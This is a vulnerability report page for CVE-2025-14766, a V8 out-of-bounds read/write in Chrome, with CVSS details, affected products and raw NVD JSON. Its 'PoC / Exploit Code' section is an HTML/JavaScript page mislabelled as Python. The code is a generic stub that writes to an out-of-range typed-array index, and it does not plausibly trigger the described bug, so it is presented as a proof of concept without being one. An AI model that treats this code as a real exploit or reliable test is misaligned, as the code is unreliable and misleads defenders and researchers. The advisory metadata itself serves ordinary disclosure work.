Security Vulnerability Report
中文
CVE-2025-14766 CVSS 8.8 HIGH

CVE-2025-14766

Published: 2025-12-16 23:15:45
Last Modified: 2025-12-23 17:06:24

Description

Out of bounds read and write in V8 in Google Chrome prior to 143.0.7499.147 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Google Chrome < 143.0.7499.147
Chromium-based browsers using V8 engine < 143.0.7499.147

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-14766 PoC - V8 Out of Bounds Read/Write // This PoC demonstrates the vulnerability trigger mechanism // Note: Actual exploitation requires specific V8 version targeting <!DOCTYPE html> <html> <head> <title>CVE-2025-14766 PoC</title> </head> <body> <h1>CVE-2025-14766 V8 OOB Access PoC</h1> <p>Target: Google Chrome < 143.0.7499.147</p> <button onclick="triggerVuln()">Trigger Vulnerability</button> <pre id="output"></pre> <script> function triggerVuln() { const output = document.getElementById('output'); try { // Create array buffer with specific size const buffer = new ArrayBuffer(0x100); const view = new Uint8Array(buffer); // Trigger V8 optimization path that may have bounds check issue // This is a simplified demonstration structure function oobAccess(idx) { // Potential OOB access through JIT optimization bypass // Actual exploit requires precise memory layout manipulation const arr = new Uint8Array(16); // Type confusion to trigger optimization bug for (let i = 0; i < 100; i++) { arr[idx] = 0x41; } return arr[idx]; } // Heat up JIT compiler for (let i = 0; i < 10000; i++) { oobAccess(0); } // Trigger with negative or large index // May cause OOB read/write in vulnerable versions const result = oobAccess(0xFFFFFFFF); output.textContent = 'PoC executed. Check browser console for crash or behavior.'; console.log('CVE-2025-14766 trigger attempted'); console.log('Result:', result); } catch (e) { output.textContent = 'Error: ' + e.message; console.error(e); } } </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14766", "sourceIdentifier": "[email protected]", "published": "2025-12-16T23:15:44.613", "lastModified": "2025-12-23T17:06:24.257", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out of bounds read and write in V8 in Google Chrome prior to 143.0.7499.147 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}, {"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "143.0.7499.146", "matchCriteriaId": "4CC700EA-0A87-4454-B4B2-1695356405B4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2025/12/stable-channel-update-for-desktop_16.html", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/466786677", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}]}}